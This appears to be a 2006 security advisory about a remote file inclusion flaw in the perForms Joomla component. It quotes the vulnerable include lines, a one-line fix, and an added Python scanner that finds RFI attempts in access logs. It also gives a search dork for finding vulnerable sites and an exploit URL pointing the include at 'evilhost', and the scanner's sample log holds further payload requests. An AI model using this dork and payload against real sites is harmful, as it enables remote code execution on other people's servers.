Computer Security
[EN] securityvulns.ru

From: endeneu_(at)_linuxmail.com <endeneu_(at)_linuxmail.com>
Date: 14.07.2006
Subject: perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

---------------------------------------------------------------------------
perForms  <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
---------------------------------------------------------------------------

Remote : Yes
Critical Level : High

Vuln found in a log file: lazy 0day!!! :D



Description:
~~~~~~~~~~~~

Application :  perForms Joomla Component
Version : latest version [1.0]
URL : http://forge.joomla.org/sf/projects/performs

Variable $mosConfig_absolute_path is not sanitized: xpl works with register_globals=on

in /components/com_performs/com_performs/performs.php on lines 6-10

require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_template.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_valid.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_phpForm.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myLib.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/class.performs.php" );


Exploit:
~~~~~~~~

dork: inurl:"com_performs" -> finds ~12.000 sites (!)

http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost
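The author says this one was found by reading a log file. As an added example that is not part of the original advisory, the following Python scanner walks Apache combined-format access-log lines and flags any request that sets mosConfig_absolute_path (the parameter named above) to a value beginning with a URL scheme, which is exactly what register_globals=on turns into the include path of the require_once() calls. The log lines, addresses, paths and user agents are constructed for the example; the HTTP status is kept per hit so a 200 on such a request (the include may have succeeded) can be triaged ahead of a 404.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" format. Addresses, paths and
# user agents are made up for this example; only the parameter name
# mosConfig_absolute_path comes from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jul/2006:10:01:12 +0000] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://203.0.113.9/x.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.3 - - [14/Jul/2006:10:02:45 +0000] "GET /index.php?option=com_performs&Itemid=5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jul/2006:10:03:01 +0000] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp%3A%2F%2F203.0.113.9%2Fx HTTP/1.1" 404 231 "-" "curl/7.15.0"
192.0.2.10 - - [14/Jul/2006:10:05:33 +0000] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target and status of a combined-format line
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A value that starts with a stream-wrapper scheme is what turns
# require_once($mosConfig_absolute_path . "/...") into a fetch of remote code
# (allow_url_fopen is on by default in the PHP 4/5 releases of this period).
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp|php)://', re.IGNORECASE)


def find_rfi_attempts(log_text, watched_params=("mosConfig_absolute_path",)):
    """Return one dict per request whose query string sets a watched parameter
    (Joomla's $mosConfig_absolute_path by default) to a remote URL.
    Pass watched_params=None to check every parameter, which catches the same
    pattern aimed at other include-path globals."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip, don't guess
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if watched_params is not None and name not in watched_params:
                continue
            # parse_qsl percent-decodes once; decode again so a double-encoded
            # "http%253A%252F%252F..." does not slip past the scheme check
            decoded = unquote(value)
            if REMOTE_SCHEME_RE.match(decoded):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "param": name,
                    "value": decoded,
                    "status": int(m.group("status")),
                })
    return hits


def attempts_by_source(hits):
    """Count attempts per client address; a scanner working through a dork
    list shows up as one address hitting the same component path repeatedly."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["ip"]} {h["param"]}={h["value"]} -> HTTP {h["status"]}')
    print(attempts_by_source(found))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. The watched-parameter list is the only Joomla-specific part; with watched_params=None the same scan reports any query parameter carrying a remote URL, which is useful when a site runs several components with the same register_globals dependence.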


Fix
~~~~

Add before the code:

defined('_VALID_MOS') or die('Direct access to this location is not allowed.');


Thx
~~~~

Who works for better code and better life!


© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod